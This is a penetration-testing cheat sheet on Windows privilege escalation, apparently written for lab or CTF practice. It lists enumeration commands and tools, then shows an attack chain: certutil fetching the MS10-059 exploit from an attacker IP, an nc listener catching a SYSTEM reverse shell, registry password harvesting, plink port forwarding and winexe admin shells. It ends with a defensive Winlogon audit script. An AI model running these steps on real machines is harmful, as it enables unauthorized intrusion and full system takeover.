
Windows Privilege Escalation

tags: windows priv esc

Fuzzy Security reference
Windows Priv Esc Guide -abs
Priv Esc Windows Guide -sushant
Payload all the things

# to get system info use:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# to check patching levels use:
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn

# to list drives use:
wmic logicaldisk get caption,description,providername

# show current user
whoami

# show current privileges
whoami /priv 

# show groups for current user
whoami /groups 

# show users on the machine
net user 

# show info for user x
net user x

# show info for group x
net localgroup x

# show arp table
arp -a

# show routing table
route print

# network statistics
netstat -ano

# see defender status (sc is service control)
sc query windefend

# see all services running
sc queryex type= service

# see state of fw through either of these two commands
netsh firewall show state
netsh advfirewall firewall dump

# see config
netsh firewall show config


Automated Tools Overview

WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Sherlock - https://github.com/rasta-mouse/Sherlock

Watson - https://github.com/rasta-mouse/Watson

PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

JAWS - https://github.com/411Hall/JAWS

Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

Seatbelt - https://github.com/GhostPack/Seatbelt

SharpUp - https://github.com/GhostPack/SharpUp

To install pip in case you don't have it (several of the tools above are Python scripts):
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits

Manual Exploitation

We can compile the exploit, then set up a web server with Python for the victim machine to reach out to and download the file.

# set up the server (python 2)
python -m SimpleHTTPServer 80
# or (python 3; the module name is lowercase, and the port must be given since it defaults to 8000)
python3 -m http.server 80

# navigate to the webserver and download the file
certutil -urlcache -f http://ip/filename localName
e.g. certutil -urlcache -f http://10.10.14.4/MS10-059.exe ms.exe

We then set up a listener for the victim to connect back to:

# setup a listener on the attacker machine
nc -nlvp 5555

# run the exploit on the victim
ms.exe ip port
e.g. ms.exe 10.10.14.4 5555
# pops a shell as NT AUTHORITY\SYSTEM

MS10-059 Exploit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

Password abuse

# once we have a shell we can run the command below to look for default passwords stored in the registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# for machines where a port is only available internally, we can forward that port if we have a low level shell
# we can forward the traffic using plink.exe which can be downloaded from the putty download page
# before using plink, edit /etc/ssh/sshd_config on the attacker machine to allow root login by setting PermitRootLogin yes
# the command syntax is (-R opens attackerListenPort on the attacker side and forwards it to victimPort on the victim):
# plink.exe -l SuperUser -pw Passwd -R attackerListenPort:localhost:victimPort attackerIP
plink.exe -l root -pw rootPass -R 445:127.0.0.1:445 10.10.14.4

# we can pop an admin shell with the command below over the previously forwarded port
winexe -U Administrator%Passwd //127.0.0.1 "cmd.exe"
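As an added example (not from the original note), a small Python audit helper that parses the output of the Winlogon reg query above and reports whether a cleartext autologon password is stored there, without echoing the secret itself; the sample reg query output is constructed.

```python
import re
from typing import Dict, List, Tuple

# One value line of `reg query` output looks like: "    Name    REG_TYPE    data"
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")

# Constructed sample output of:
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    svc_build
    DefaultDomainName    REG_SZ    CORP
    DefaultPassword    REG_SZ    Winter2020!
    Shell    REG_SZ    explorer.exe
"""


def parse_reg_query(output: str) -> Dict[str, Tuple[str, str]]:
    """Parse `reg query <key>` text into {value_name: (reg_type, data)}."""
    values: Dict[str, Tuple[str, str]] = {}
    for line in output.splitlines():
        m = VALUE_RE.match(line)
        if m:  # the key path line has no leading whitespace and is skipped
            name, reg_type, data = m.groups()
            values[name] = (reg_type, data.strip())
    return values


def audit_winlogon(output: str) -> List[str]:
    """Return findings about autologon credentials; the password is never echoed."""
    values = parse_reg_query(output)
    autologon = values.get("AutoAdminLogon", ("", "0"))[1] == "1"
    user = values.get("DefaultUserName", ("", ""))[1] or "<unknown user>"
    domain = values.get("DefaultDomainName", ("", ""))[1]
    password = values.get("DefaultPassword", ("", ""))[1]
    who = f"{domain}\\{user}" if domain else user
    findings: List[str] = []
    if password:  # cleartext credential readable by any local user
        state = "enabled" if autologon else "disabled"
        findings.append(f"HIGH: cleartext DefaultPassword ({len(password)} chars) stored for {who}; "
                        f"AutoAdminLogon is {state}. Remove the value and keep the credential in the "
                        f"DefaultPassword LSA secret (e.g. via Sysinternals Autologon), or disable autologon.")
    elif autologon:
        findings.append(f"INFO: AutoAdminLogon=1 for {who} with no plaintext DefaultPassword value "
                        f"(credential is probably held in the LSA secret instead).")
    return findings


if __name__ == "__main__":
    for finding in audit_winlogon(SAMPLE_OUTPUT):
        print(finding)
```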

Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Stabilizing a shell

TTY shell escape